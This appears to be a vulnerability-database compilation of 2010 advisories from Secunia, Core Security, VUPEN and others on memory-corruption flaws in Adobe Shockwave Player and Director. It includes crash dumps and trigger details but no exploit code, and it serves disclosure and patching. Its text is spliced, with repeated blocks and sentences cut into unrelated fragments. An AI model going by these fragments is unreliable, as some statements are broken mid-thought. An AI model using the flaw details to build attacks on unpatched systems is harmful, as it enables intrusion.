Adobe Shockwave Player before 11.5.7.609 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted FFFFFF45h Shockwave 3D blocks in a Shockwave file. Adobe Shockwave Player is prone to a remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From remote
======================================================================
3) Vendor's Description of Software
"Over 450 million Internet-enabled desktops have installed Adobe
Shockwave Player.
======================================================================
6) Time Table
02/03/2010 - Vendor notified.
02/03/2010 - Vendor response.
12/05/2010 - Public disclosure.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0127 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-17/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201005-0051 | CVE-2010-0128 | Adobe Shockwave Player and Adobe Director Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Integer signedness error in dirapi.dll in Adobe Shockwave Player before 11.5.7.609 and Adobe Director before 11.5.7.609 allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted .dir file that triggers an invalid read operation. Adobe Shockwave Player is prone to a remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From remote
======================================================================
3) Vendor's Description of Software
"Over 450 million Internet-enabled desktops have installed Adobe
Shockwave Player. ".dir") is opened.
======================================================================
6) Time Table
03/03/2010 - Vendor notified.
12/05/2010 - Public disclosure.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0128 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-19/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
_______________________________________________
Full-Disclosure - We believe in it. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://corelabs.coresecurity.com/
Adobe Director DIRAPI.DLL Invalid Read Vulnerability
1. *Advisory Information*
Title: Adobe Director DIRAPI.DLL Invalid Read Vulnerability
Advisory Id: CORE-2010-0405
Advisory URL:
[http://www.coresecurity.com/content/adobe-director-invalid-read]
Date published: 2010-05-11
Date of last update: 2010-05-11
Vendors contacted: Adobe
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Input validation error [CWE-20]
Impact: Denial of service
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
CVE Name: CVE-2010-0128
Bugtraq ID: N/A
3. *Vulnerability Description*
Adobe Director is prone to a vulnerability due to an invalid read in
'DIRAPI.DLL', when opening a malformed .dir file.
4. *Vulnerable packages*
. Adobe Director 11.5
. Adobe Director 11 (Version: 11.0.0.426)
5. *Non-vulnerable packages*
. Adobe Director 11.5 (Version: 11.5.7.609)
6. *Solutions and Workarounds*
See the Adobe Security Bulletin [1] available at
[http://www.adobe.com/go/apsb10-12/].
7. *Credits*
This vulnerability was discovered and researched by Nahuel Riva, from
Core Security Technologies. Publication was coordinated by Jorge
Lucangeli Obes.
8. *Technical Description*
The vulnerability occurs at offset '0x68174813' of the 'dirapi.dll'
module of Adobe Director. Improper validation of input data leads to a
crash in the memory read instruction. This vulnerability could result in
arbitrary code execution, although it was not verified.
/-----
App: Adobe Director 11
Version: 11.0.0.426
Module crash: Dirapi.dll Version: 11.0.0.426
Crash:
68174813 |. 8906 |MOV DWORD PTR DS:[ESI],EAX
68174815 |> 8B4C24 14 |MOV ECX,DWORD PTR SS:[ESP+14]
68174819 |. 51 |PUSH ECX
6817481A |. E8 3197F5FF |CALL <JMP.&IML32.#1414>
6817481F |. 8946 04 |MOV DWORD PTR DS:[ESI+4],EAX
68174822 |. 83C6 08 |ADD ESI,8
68174825 |. 4D |DEC EBP
68174826 |.^ 75 C8 \JNZ SHORT DIRAPI.681747F0
EAX=00000000
DS:[02889B20]=???
Registers:
EAX 00000000
ECX 00000068
EDX 00000001
EBX FFE4B4D4
ESP 0012DFB8
EBP 0000373D
ESI 02889B20
EDI 01BC9964
EIP 68174813 DIRAPI.68174813
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDD000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_NEGATIVE_SEEK (00000083)
EFL 00250246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -??? FFFF 00000000 00000000
ST1 empty -??? FFFF 00000000 00000000
ST2 empty -??? FFFF 00000000 00000000
ST3 empty -??? FFFF 00000000 00000000
ST4 empty 0.0000106994366433355
ST5 empty 0.6322773098945617676
ST6 empty -0.0034003453329205513
ST7 empty 1041416.9375000000000
3 2 1 0 E S P U O Z D I
FST 4220 Cond 1 0 1 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 007F Prec NEAR,24 Mask 1 1 1 1 1 1
Stack Trace:
Call stack of main thread
Address Stack Procedure / arguments Called from
Frame
0012DFC4 68175563 DIRAPI.681747A0 DIRAPI.6817555E
0012DFE4 6817003B DIRAPI.68175290 DIRAPI.68170036
0012E018 6817020D DIRAPI.6816FF40 DIRAPI.68170208
0012E01C 00A923C8 Arg1 = 00A923C8
0012E020 00000011 Arg2 = 00000011
0012E024 00000003 Arg3 = 00000003
0012E028 0012E050 Arg4 = 0012E050
0012E02C 00001100 Arg5 = 00001100
0012E048 680F6D50 DIRAPI.681701A0 DIRAPI.680F6D4B
0012E04C 00000000 Arg1 = 00000000
0012E050 00000003 Arg2 = 00000003
0012E054 00000091 Arg3 = 00000091
0012E058 0012E07C Arg4 = 0012E07C
0012E05C 00001100 Arg5 = 00001100
0012E068 6800CFC0 DIRAPI.680F6D30 DIRAPI.6800CFBB
0012E088 680817EC DIRAPI.6800CF80 DIRAPI.680817E7
0012E0B4 680823E3 DIRAPI.68081760 DIRAPI.680823DE
0012E0C8 680836A7 DIRAPI.68082380 DIRAPI.680836A2
0012E638 680839E2 DIRAPI.68082EA0 DIRAPI.680839DD
0012E634
0012E63C 00A86E8C Arg1 = 00A86E8C
0012E640 0012F5EC Arg2 = 0012F5EC
0012E644 00000000 Arg3 = 00000000
0012E648 00000000 Arg4 = 00000000
0012E64C 0000001A Arg5 = 0000001A
0012E674 68042D8C DIRAPI.68083970 DIRAPI.68042D87
0012F5EC
0012E678 00A86E8C Arg1 = 00A86E8C
0012E67C 0012F5EC Arg2 = 0012F5EC
0012E680 00000000 Arg3 = 00000000
0012E684 00000000 Arg4 = 00000000
0012E688 0000001A Arg5 = 0000001A
0012E6B0 6800A111 DIRAPI.68042C90 DIRAPI.#88+7C
0012E6B4 00A92588 Arg1 = 00A92588
0012E6B8 0012F5EC Arg2 = 0012F5EC
0012E6BC 00000000 Arg3 = 00000000
0012E6C0 0000001A Arg4 = 0000001A
0012E6DC 2018BB23 <JMP.&DIRAPI.#88> Director.2018BB1E
0012E83C 2027E776 ? Director.2018BAB0 Director.2027E771
- -----/
9. *Report Timeline*
. 2010-04-14:
Vendor contacted. 2010-04-14:
Vendor requests PoC file. 2010-04-14:
Core replies with the PoC file and the draft advisory. 2010-04-14:
Adobe replies that will investigate the issue and sets a preliminary
release date for June/July. 2010-04-15:
Core agrees with the preliminary release date. 2010-04-28:
Core requests an update on the situation, and asks whether Adobe was
able to confirm if the bug is exploitable. 2010-04-28:
Core requests a specific publication date for the fix. 2010-05-06:
Adobe informs Core that the release date for the fix has been set to May
11th. 2010-05-07:
Core asks Adobe if they want to provide the text for the "Solutions and
Workarounds" section of the advisory. 2010-05-07:
Adobe replies with the text for the "Solutions and Workarounds" section
of the advisory. 2010-05-11:
Advisory published.
10. *References*
[1] Adobe Security Bulletin [http://www.adobe.com/go/apsb10-12/].
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://www.coresecurity.com/corelabs].
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].
13. *Disclaimer*
The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iEYEARECAAYFAkvptp4ACgkQyNibggitWa2lwACgo9oRhMUsmUe+IH3jdK9d7B+m
ebMAn1iAO1mYBqXGrm67F2oCxTd+OEe3
=s6Ek
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201005-0052 | CVE-2010-0129 | Adobe Shockwave Player Integer overflow vulnerability |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
Multiple integer overflows in Adobe Shockwave Player before 11.5.7.609 allow remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted .dir (aka Director) file that triggers an array index error. Adobe Shockwave Player is prone to multiple remote code-execution vulnerabilities while parsing Director (.dir) files.
Attackers can exploit these issues to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts may cause a denial-of-service condition.
Versions prior to Shockwave Player 11.5.7.609 are vulnerable.
Note: These issues were previously covered in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities); they have been given their own record to better document them. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. User interaction is required
in that a user must visit a malicious web site. When a malicious value is used
extern to signed integer . Exploitation can lead to remote system
compromise under the credentials of the currently logged in user.
2010-5-11 Coordinated public release of advisory.
About Code Audit Labs:
=====================
Code Audit Labs is department of VulnHunt company which provide a
professional security testing products / services / security consulting
and training ,we sincerely hope we can help your procudes to improve code
quality and safety.
WebSite http://www.VulnHunt.com ( online soon)
. Binary Analysis & Proof-of-concept
---------------------------------------
In-depth binary analysis, code execution exploits and proof-of-concept
codes are published through the VUPEN Binary Analysis & Exploits Service :
http://www.vupen.com/exploits/
V. CREDIT
--------------
These vulnerabilities were discovered by Chaouki Bekrar of VUPEN Security
VII. ABOUT VUPEN Security
---------------------------
VUPEN is a leading IT security research company providing vulnerability
management and security intelligence solutions which enable enterprises
and institutions to eliminate vulnerabilities before they can be exploited,
ensure security policy compliance and meaningfully measure and manage risks.
Governmental and federal agencies, and global enterprises in the financial
services, insurance, manufacturing and technology industries rely on VUPEN
to improve their security, prioritize resources, cut time and costs, and
stay ahead of the latest threats.
* VUPEN Vulnerability Notification Service:
http://www.vupen.com/english/services/
* VUPEN Binary Analysis & Exploits Service :
http://www.vupen.com/exploits/
* VUPEN Web Application Security Scanner (WASS):
http://www.vupen.com/english/wass/
VIII. REFERENCES
----------------------
http://www.vupen.com/english/advisories/2010/1128
http://www.adobe.com/support/security/bulletins/apsb10-12.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0129
IX.
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From remote
======================================================================
3) Vendor's Description of Software
"Over 450 million Internet-enabled desktops have installed Adobe
Shockwave Player. ".dir") is opened.
======================================================================
6) Time Table
03/03/2010 - Vendor notified.
03/03/2010 - Vendor response.
12/05/2010 - Public disclosure.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-20/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
_______________________________________________
Full-Disclosure - We believe in it. iDefense Security Advisory 05.11.10
http://labs.idefense.com/intelligence/vulnerabilities/
May 11, 2010
I. BACKGROUND
Adobe Shockwave Player is a popular Web browser plugin. It is available
for multiple Web browsers and platforms, including Windows, and MacOS.
Shockwave Player enables Web browsers to display rich multimedia
